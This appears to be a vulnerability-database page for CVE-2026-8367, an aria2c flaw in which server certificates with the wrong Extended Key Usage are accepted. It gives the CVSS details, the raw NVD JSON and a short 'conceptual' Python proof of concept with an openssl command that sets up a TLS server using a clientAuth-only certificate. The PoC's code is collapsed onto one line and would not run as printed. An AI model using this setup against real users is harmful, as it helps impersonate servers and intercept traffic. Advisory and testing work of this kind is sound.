Security Vulnerability Report
中文
CVE-2026-8367 CVSS 4.8 MEDIUM

CVE-2026-8367

Published: 2026-05-13 16:17:05
Last Modified: 2026-05-13 16:27:11
Source: [email protected]

Description

aria2c accepts a server certificate with incorrect Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

aria2c (具体受影响版本未在提供文本中明确列出,请参考官方通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC to test EKU validation in aria2c # This script demonstrates the logic of testing the vulnerability. # It requires generating a certificate with incorrect EKU. import subprocess import socket import ssl # Step 1: Attacker generates a certificate with 'clientAuth' EKU (not 'serverAuth') # Command (conceptual): # openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes \ # -addext "extendedKeyUsage=clientAuth" def setup_malicious_server(): # Create a simple SSL context using the 'wrong' certificate context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) # Load cert intended for client auth only context.load_cert_chain('cert.pem', 'key.pem') with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.bind(('0.0.0.0', 443)) sock.listen(5) with context.wrap_socket(sock, server_side=True) as ssock: print("Server listening with clientAuth certificate...") conn, addr = ssock.accept() print(f"Connection accepted from {addr}") # If aria2c connects here without error, the vulnerability is confirmed conn.send(b"HTTP/1.1 200 OK\r\n\r\nExploit Success") conn.close() print("Note: To execute this PoC, generate 'cert.pem' with EKU=clientAuth first.") print("Then run this server and try to download from it using aria2c.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8367", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:17:04.780", "lastModified": "2026-05-13T16:27:11.127", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "aria2c accepts a server certificate with incorrect Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://www.tenable.com/security/research/tra-2026-38", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.